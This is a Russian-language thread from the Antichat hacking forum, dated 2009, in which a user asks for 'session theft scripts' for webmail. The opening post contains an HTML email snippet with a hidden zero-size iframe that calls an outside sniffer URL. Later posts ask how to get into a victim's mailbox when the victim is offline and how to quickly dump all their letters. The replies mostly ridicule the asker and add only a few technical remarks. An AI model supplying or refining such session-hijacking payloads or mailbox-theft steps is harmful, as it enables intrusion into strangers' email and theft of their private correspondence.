ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Скрипты для кражи сессии =)
  #1  
Старый 25.05.2009, 18:10
Аватар для LemoTTT
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile Скрипты для кражи сессии =)

Отписываем скрыпты для кражи сессии, сам напишу старый скрипт, посылаеться как HTML:
Код HTML:
<font color=red> Текст </font>  <iframe scr=http://antichat.ru/cgi-bin/s.jpg frameborder=0 width=0 height=0></iframe>
Есть ли еще что то, и на каких почтовых ящиках проходит?!
И еще если я украду ссесию, я могу зайти на почту жертвы, только когда она уже онлайн, или в другое время тоже(знаю, что сессия долго не живет)?!

Последний раз редактировалось LemoTTT; 25.05.2009 в 18:12..
 
Ответить с цитированием

  #2  
Старый 25.05.2009, 18:15
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Это называется XSS, о мой юный падаван
 
Ответить с цитированием

  #3  
Старый 25.05.2009, 18:16
Аватар для LemoTTT
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

Ответьте на 1 вопрос:
Если я украл сессию, я могу зайти в почтовый ящик жертвы, когда она не онлайн?
(проверял на своем ящике, когда жертва не онлайн по сессии не заходит)
и если НЕТ(не могу)- то как можно зайти в ящик жертвы имея сессию, я же не буду каждые 5 мин тыкать онлайн ли она или нет!

Последний раз редактировалось LemoTTT; 25.05.2009 в 19:43..
 
Ответить с цитированием

  #4  
Старый 25.05.2009, 21:38
Аватар для -Unlocked-
-Unlocked-
Участник форума
Регистрация: 06.12.2008
Сообщений: 194
Провел на форуме:
2349252

Репутация: 815
Отправить сообщение для -Unlocked- с помощью ICQ
По умолчанию

http://forum.antichat.ru/thread88986.html
 
Ответить с цитированием

  #5  
Старый 25.05.2009, 21:41
Аватар для Player#1
Player#1
Познающий
Регистрация: 11.11.2008
Сообщений: 77
Провел на форуме:
1144288

Репутация: 99
По умолчанию

ОМГ это уже 10 тема автора на эту тему...
 
Ответить с цитированием

  #6  
Старый 25.05.2009, 21:44
Аватар для lmns
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516

Репутация: 303


По умолчанию

Цитата:
Сообщение от Player#1  
ОМГ это уже 10 тема автора на эту тему...
И толку ноль.
 
Ответить с цитированием

  #7  
Старый 26.05.2009, 10:09
Аватар для LemoTTT
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

1) Так как можно зайти в ящик жертвы с помошью сессии, если жертва не онлайн!
2) Вдруг я угадаю время и зайду в ящик жертвы, как мне быстро сохранить все письма к себе(на раб стол или куда то)?Ну тойсть слить всю инфу за пару минут!
 
Ответить с цитированием

  #8  
Старый 26.05.2009, 10:15
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от LemoTTT  
1) Так как можно зайти в ящик жертвы с помошью сессии, если жертва не онлайн!
2) Вдруг я угадаю время и зайду в ящик жертвы, как мне быстро сохранить все письма к себе(на раб стол или куда то)?Ну тойсть слить всю инфу за пару минут!
почему ты еще не в бане ><
 
Ответить с цитированием

  #9  
Старый 26.05.2009, 10:28
Аватар для -Unlocked-
-Unlocked-
Участник форума
Регистрация: 06.12.2008
Сообщений: 194
Провел на форуме:
2349252

Репутация: 815
Отправить сообщение для -Unlocked- с помощью ICQ
По умолчанию

Э,братцы..Не раскисайте,знаете ведь,что каникулы начались...
LemoTTT,
1. тут лучше промолчать...
2. никак..имея доступ к сессии и не имея пароля(а его то ты точно не поимеешь,спи3дев сессию),ты не сможешь зайти через почтовый клиент и слить письма на хард..
Вообщем,читай,практикуйся.. .
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 248 27.10.2009 04:52
Шпаргалки для сертификатов по Битрикс Liar PHP, PERL, MySQL, JavaScript 7 30.05.2009 10:13
Начальный практикум в Code Igniter Kuzya Авторские статьи 9 20.02.2009 23:12
Софт для мобильных телефонов под *nix Grrl Сотовый фрикинг 2 02.03.2007 01:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ